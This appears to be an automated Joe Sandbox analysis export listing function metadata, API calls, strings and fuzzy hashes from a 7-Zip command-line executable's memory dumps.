                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: File$Attributesfree$Delete
                                • String ID:
                                • API String ID: 324319583-0
                                • Opcode ID: df10b4b8c6684096170c9c9ab05feeb6452345b4778a22d60cfa43d5eec70c0a
                                • Instruction ID: 3aa572131a2a3509f4299e85b63e811f64885eac3a2cdb4051f34379efcce90d
                                • Opcode Fuzzy Hash: df10b4b8c6684096170c9c9ab05feeb6452345b4778a22d60cfa43d5eec70c0a
                                • Instruction Fuzzy Hash: 4801883234860151CA30AA35A9512EE17319BC67F8F581727ED6E877E5DF3CC9C78608
                                Function 00426E88 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLastmemmove
                                • String ID: :
                                • API String ID: 3561842085-3653984579
                                • Opcode ID: f731f73897d40f4106503fc5ae5574629f1505dfaec5e9930ae7f0c8b602ac3b
                                • Instruction ID: f3ea48bcbaa989167e3818ebe1cfc8736ad7774d24a0ee4233506eb73bc4a2d6
                                • Opcode Fuzzy Hash: f731f73897d40f4106503fc5ae5574629f1505dfaec5e9930ae7f0c8b602ac3b
                                • Instruction Fuzzy Hash: 3E11A7A330594491CA20EB2AE84129A6721DBC87E8F444326BE5D87779DE7CCA86C704
                                Function 0041EA4C Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast$FileHandleRead
                                • String ID:
                                • API String ID: 2244327787-0
                                • Opcode ID: 2a36d553e8cbc6b90497e1e8e87a78b980c29a6e2c3229926d861df111c85240
                                • Instruction ID: 8ffbf0f4bca09cd1aa8f77679463c7b300929a09466fbfb6c6b674c395d5f742
                                • Opcode Fuzzy Hash: 2a36d553e8cbc6b90497e1e8e87a78b980c29a6e2c3229926d861df111c85240
                                • Instruction Fuzzy Hash: EF01F2617254A0CBD7229B3E9D003A66394FB08BE1F900222FF4ACB790DB6DCC858749
                                Function 0046AFF4 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                • API String ID: 1795875747-932691680
                                • Opcode ID: 3b51bad71ed66dee9a6b61554904a1aa5bbe3a362506ed0db8cd84c3a8e8bfd2
                                • Instruction ID: aed82a37c2e9de8efec3802062b14071ea6ce2d9b15f46c7c21dbaf24f21ddec
                                • Opcode Fuzzy Hash: 3b51bad71ed66dee9a6b61554904a1aa5bbe3a362506ed0db8cd84c3a8e8bfd2
                                • Instruction Fuzzy Hash: 1D0129B2241A05D9DB04EF21E8803AA2325E791788F844526EB5D96225EF7CC9D9C78B
                                Function 00417088 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: DirectoryRemovefree
                                • String ID:
                                • API String ID: 736856642-0
                                • Opcode ID: cbcf866b53d13db80e8e222a7ee0d8887e3a5f826af55dbd1e24815ed5a3ca40
                                • Instruction ID: 699ca4f0d1ba3e473e467e0993d7abae8f0ba855fabc53eddaca4ebb2fe1febb
                                • Opcode Fuzzy Hash: cbcf866b53d13db80e8e222a7ee0d8887e3a5f826af55dbd1e24815ed5a3ca40
                                • Instruction Fuzzy Hash: 65F08B3224C74591D9205B21D9942AD133497867F4F5403179D69877A5DF1DCAC6C718
                                Function 0046DBD0 Relevance: 6.0, APIs: 4, Instructions: 40threadCOMMON
                                Download Yara Rule
                                APIs
                                • _beginthreadex.MSVCRT ref: 0046DC05
                                • SetThreadAffinityMask.KERNEL32 ref: 0046DC21
                                • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00430036), ref: 0046DC2A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00430036), ref: 0046DC35
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Thread$AffinityErrorLastMaskResume_beginthreadex
                                • String ID:
                                • API String ID: 3268521904-0
                                • Opcode ID: 0eb2c4fed634916439255adc594d4315e165d013655c49e6180ab7547dcb86a1
                                • Instruction ID: 948b0d726b5c9243b5c16a7e2f82fd144f3596f4b7bce366a44d1aea072c420a
                                • Opcode Fuzzy Hash: 0eb2c4fed634916439255adc594d4315e165d013655c49e6180ab7547dcb86a1
                                • Instruction Fuzzy Hash: 85012171B09B84C6DB048B62B80435AB3A5F789BE4F444125EF8D93B68DF3CD455C704
                                Function 0046DAF0 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB0B
                                • GetLastError.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB15
                                • CloseHandle.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB30
                                • GetLastError.KERNEL32(?,?,?,?,0042DC82), ref: 0046DB3A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorLast$CloseHandleObjectSingleWait
                                • String ID:
                                • API String ID: 1796208289-0
                                • Opcode ID: 20927bd67de178b141ed70e46c2400a5cb6a50c06f908c91ecc38c4b6e214695
                                • Instruction ID: 0b8f1845b998575d1e7a57c6fb49232fbd6371725dfb43316e7a24653766fc10
                                • Opcode Fuzzy Hash: 20927bd67de178b141ed70e46c2400a5cb6a50c06f908c91ecc38c4b6e214695
                                • Instruction Fuzzy Hash: 6D013136B05B40C2D7109F65A88031AB3A5FBC8FD1FA94125DB9A83768DF3DD8458705
                                Function 0046C240 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$fputcfree
                                • String ID:
                                • API String ID: 3819637083-0
                                • Opcode ID: 9f94f85f5eb7c4e557b7fb12d6d5b0e10416a2ff7c0cdc68169419931a485bf7
                                • Instruction ID: e6807761cf95747eac16d3ce10fcd466b451075632ee9b1308b6519ddee04cb8
                                • Opcode Fuzzy Hash: 9f94f85f5eb7c4e557b7fb12d6d5b0e10416a2ff7c0cdc68169419931a485bf7
                                • Instruction Fuzzy Hash: D0F049A220460081DE209B26F95139A6320AB99FF8F0443229F6E437A4DF2CC585C708
                                Function 00463BCC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • memmove.MSVCRT ref: 00463C15
                                  • Part of subcall function 0046266C: CompareFileTime.KERNEL32(?,?,?,00000000,00463C28), ref: 004626B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CompareFileTimememmove
                                • String ID: alternate streams$files$streams
                                • API String ID: 1303509325-806849385
                                • Opcode ID: d66be76babb78bd12987e0d8c24c2a97867c662a3c1aea18026358ed3a82a895
                                • Instruction ID: df2e985cc5bdd5c3ce682e9f40abd508bce290331da15d60dfc7a2b94b24cca0
                                • Opcode Fuzzy Hash: d66be76babb78bd12987e0d8c24c2a97867c662a3c1aea18026358ed3a82a895
                                • Instruction Fuzzy Hash: 1DF0C2A23049D9A2EB20EF66D511B895321F754BCCFC05017AA4D07E64AF3CC79ACB49
                                Function 004155AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID: UNC
                                • API String ID: 0-337201128
                                • Opcode ID: 040324d980f1719f02727546357e513bd059180586bb5427fb9611b820104c27
                                • Instruction ID: 11fc39c32bc9c2f369fbc1942afe84beac39af261a6951d1a32b13b8ae2bcf92
                                • Opcode Fuzzy Hash: 040324d980f1719f02727546357e513bd059180586bb5427fb9611b820104c27
                                • Instruction Fuzzy Hash: 57216476300E05DADB208B1AD4903E92321E7D4B88F949427CF4E8B720EB3EC8C6C749
                                Function 0045FE5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0045FEC9
                                • free.MSVCRT ref: 0045FEE8
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$freememset
                                • String ID: ERROR:
                                • API String ID: 2276422817-977468659
                                • Opcode ID: a2baf9af4664a053be38112e0b3bb75097c013ad0719e75ed6bedbb6da8c5620
                                • Instruction ID: fdadbacbc4964d0e1b3a76fe529fe3861e875f13e28b24aec2c11d086d85b563
                                • Opcode Fuzzy Hash: a2baf9af4664a053be38112e0b3bb75097c013ad0719e75ed6bedbb6da8c5620
                                • Instruction Fuzzy Hash: 4D11BC6230164042DA24FB17EA117AE2310E7857E8F444637AE2F87792DF6CC495C318
                                Function 0041C59C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C5EA
                                • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0041C638
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: QueryValue
                                • String ID: Path64
                                • API String ID: 3660427363-321863482
                                • Opcode ID: 3e36a2070c8cd30f763719b18a8e4b0c4c1538323c3854aa666b6aa9b8727d3f
                                • Instruction ID: 5c79654f0654df605cf4f0b61932dbc353a9d32f9d9cea5c6b983ad585571988
                                • Opcode Fuzzy Hash: 3e36a2070c8cd30f763719b18a8e4b0c4c1538323c3854aa666b6aa9b8727d3f
                                • Instruction Fuzzy Hash: E4215EB3615640C7EB14CF25E89475E77A1F784B84F20911AEB8947BA8DB3CC885CF44
                                Function 00464030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Cannot open the file as archive, xrefs: 0046408C
                                • Cannot open encrypted archive. Wrong password?, xrefs: 0046404B
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: Cannot open encrypted archive. Wrong password?$Cannot open the file as archive
                                • API String ID: 1795875747-1623556331
                                • Opcode ID: 406939c85782bb06464027af9e1805aad8b3d36c0e5a8ec608c0f1a7ec24f3c7
                                • Instruction ID: 2ec353c73bab40c974b58564dc78636bd4ad98fdd2a5a9a388a1efbb9d651a8b
                                • Opcode Fuzzy Hash: 406939c85782bb06464027af9e1805aad8b3d36c0e5a8ec608c0f1a7ec24f3c7
                                • Instruction Fuzzy Hash: E1018FA231065192DF18EB2BDA4039D2311EB89BC8F44A0379F0E87751DE7DC8A9C70A
                                Function 0041A248 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: wcscmp
                                • String ID: \??\
                                • API String ID: 3392835482-3047946824
                                • Opcode ID: af393b9c7b079674be752cf34931546a976f289b8089ea351c38a9871534e838
                                • Instruction ID: 6ef3d6d29544193a23a2e78c82ab8515bcedbe24886995d30d68e104e66a9920
                                • Opcode Fuzzy Hash: af393b9c7b079674be752cf34931546a976f289b8089ea351c38a9871534e838
                                • Instruction Fuzzy Hash: 41F06D72206440D7CE059BAADAD036C2321F781B89F945923DB0E87714CF29D8FAC31A
                                Function 004617A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 004617C9
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputcfputs
                                • String ID: Scan$Scanning
                                • API String ID: 269475090-1436252306
                                • Opcode ID: 68ddf7543c82f317a32dc77ff1501909998629b555e21f505239b860f0a2c00c
                                • Instruction ID: b7d905cc751796611378e03a87cf202e4577744738288b6be5546dbb3d70342c
                                • Opcode Fuzzy Hash: 68ddf7543c82f317a32dc77ff1501909998629b555e21f505239b860f0a2c00c
                                • Instruction Fuzzy Hash: F2F0BEB670198591DB04DB26CA457A82321EB44B8DF5C4127CB0D8B6A4EF2CC9DAC318
                                Function 0041C084 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AllocExceptionStringThrow
                                • String ID: out of memory
                                • API String ID: 3773818493-2599737071
                                • Opcode ID: fee9fe5cc1f96ddeb0f4fccb085440423c7cc7129ed4ae58c0e1be1705a74dce
                                • Instruction ID: dffe161a7d82461da52af7c56be8c916cf9b92beb826771720dc2b15db41615f
                                • Opcode Fuzzy Hash: fee9fe5cc1f96ddeb0f4fccb085440423c7cc7129ed4ae58c0e1be1705a74dce
                                • Instruction Fuzzy Hash: 0AF0A062702B85D2CB049B11EA8474C6370FB49B88F94D425CB4C07B24FF78C8E8C704
                                Function 0046BA90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • fputs.MSVCRT ref: 0046BAB0
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputcfputs
                                • String ID: Scan $Scanning the drive:
                                • API String ID: 269475090-1085461122
                                • Opcode ID: b291f16de502133b7f8dd8d3f1c8f31b5fbf42d98e57fcde88e5f700de1abd70
                                • Instruction ID: be0783440ace739977128907fa82b479287202e54de9e6bdc19149cd1bbe031d
                                • Opcode Fuzzy Hash: b291f16de502133b7f8dd8d3f1c8f31b5fbf42d98e57fcde88e5f700de1abd70
                                • Instruction Fuzzy Hash: FEE04FA531294181DB05DB26DB413981321DB44FE8F9455228E1D46624EF18C9EAC314
                                Function 0044D464 Relevance: 5.3, APIs: 4, Instructions: 261COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 0044D4F6
                                • free.MSVCRT ref: 0044D4FE
                                • free.MSVCRT ref: 0044D7E8
                                • free.MSVCRT ref: 0044D7F0
                                  • Part of subcall function 00415A4C: free.MSVCRT ref: 00415A90
                                  • Part of subcall function 00415A4C: free.MSVCRT ref: 00415A98
                                  • Part of subcall function 00415A4C: free.MSVCRT ref: 00415B9C
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: df663b0ff9642ca60b76f42d4679277dfc21800659a2e89ca9e4bff6330dd2c6
                                • Instruction ID: 81ed09cd8cb01860e2598a3973b32a7dbafb054f83053a00d98f78b5a7dd8f29
                                • Opcode Fuzzy Hash: df663b0ff9642ca60b76f42d4679277dfc21800659a2e89ca9e4bff6330dd2c6
                                • Instruction Fuzzy Hash: EBA1DD32B04B8096EB20DF26D1843AE7760F785B88F15422BDF9A47790EB3DC865C709
                                Function 0041F9FC Relevance: 5.1, APIs: 4, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: ffb0adaf41483c79c17ca139e504a8e53c9321f0d0374eb2d4ffe7ddeb855848
                                • Instruction ID: 1046e927d5258e0f04c3007f67dcd70c1e99347e80f06c9abc607d4472d0ecd8
                                • Opcode Fuzzy Hash: ffb0adaf41483c79c17ca139e504a8e53c9321f0d0374eb2d4ffe7ddeb855848
                                • Instruction Fuzzy Hash: 7241F47260868186C730AB15D5502EE6661E7943E8F44C237EF9D4B758EB2CC9DBC708
                                Function 00448798 Relevance: 5.1, APIs: 4, Instructions: 85COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 69c9dc79736f9a58dea89d4ea6f5c2c7f962fc755dfbbe98bf6e852ff16fa1cf
                                • Instruction ID: d4eabdc803558c5caae25debfc7ad7e2c0937cddfe8f11d93c5f45f93cd6447a
                                • Opcode Fuzzy Hash: 69c9dc79736f9a58dea89d4ea6f5c2c7f962fc755dfbbe98bf6e852ff16fa1cf
                                • Instruction Fuzzy Hash: 9A21F733601B8885EB15AF27E85476E7754BB84B98F6C812E9F590B340EF7CC882C318
                                Function 0045E418 Relevance: 5.1, APIs: 4, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                • Opcode ID: 38d5f30d07a27ab72b3019f36445ad2f1ddd300a59225253cba905e3d677750f
                                • Instruction ID: ab13712156c5bff8d8bf780bea641cdbdbd30abfade6199d2c33e09c18e962a3
